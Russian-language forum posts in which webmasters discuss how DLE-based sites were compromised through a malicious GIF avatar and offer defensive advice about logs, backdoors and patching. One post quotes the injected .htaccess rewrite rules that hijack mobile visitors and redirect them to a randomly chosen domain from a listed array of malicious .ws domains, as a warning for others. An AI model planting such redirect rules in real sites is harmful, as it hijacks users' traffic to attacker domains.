Смотрите логи FTP и HTTP если в них ничего подозрительного нет, то ломают через хостера.
Или хостер восстанавливает "битый" бекап вашего сайта.
И если у вас нулл, то надо еще и прошерстить на наличие бекдоров весь движок.
Ломают через дыру в DLE это не зависит от хостинга.
В гиф'ке просто пхп код на внедрение вредоносного кода в ваши файлы(поиск и запись в файлы).
Видимо у всех различные способы, которыми вас взломали.
В каждом случае надо детально просмотреть и найти через что вас взломали.
Смотрите логи и даты изменения файлов.
Могу помочь если сами не знаете, что делать.
Помогу исправить уязвимость в ДЛЕ.
Там двойной md5 - рашифровка займет перебором очень большое время.
Последние вести с фронтов.
Теперь еще изменяют файл .htaccess
RewriteCond %{QUERY_STRING} (^|&)noredirect=true(&|$)
RewriteRule ^ - [CO=mredir:0:%{HTTP_HOST},S]
RewriteCond %{HTTP:x-wap-profile} !^$ [OR]
RewriteCond %{HTTP:Profile} !^$
RewriteCond %{HTTP_HOST} !^m\.
RewriteCond %{HTTP:Cookie} !\smredir=0(;|$)
RewriteRule ^ http://$host/ [R,L]
В $host вставляется случайным образом выбранный домен из массива:
$domains = array('statuses.ws', 'live-internet.ws', 'googlecount.ws', 'livecountall.ws', 'googleinternet.ws', 'yacounter.ws', 'getinternet.ws', 'yandex-google.ws', 'ya-googl.ws', 'ya-analytics.ws', 'yadirect.ws');
Проверяйте свои сайты.
Там же хеши md5
Если вас взломали именно аватаром, то надо сделать вот это
/ru/forum/comment/11407417
вот в этих файлах
engine/inc/editusers.php
engine/modules/register.php
engine/modules/profile.php
Значит у вас "дыра" до сих пор не прикрыта, читайте ветку, там выше есть решение
Если вы удалили "неправильные" картинки, то теперь уже сложно что-то сказать.
Если только посмотреть логи ftp на предмет обращения к ним.
Или логи апача именно по этим картинкам и сравнить их размеры.
Если размер изменился, то посмотреть что там делали у вас на сайте и кто.
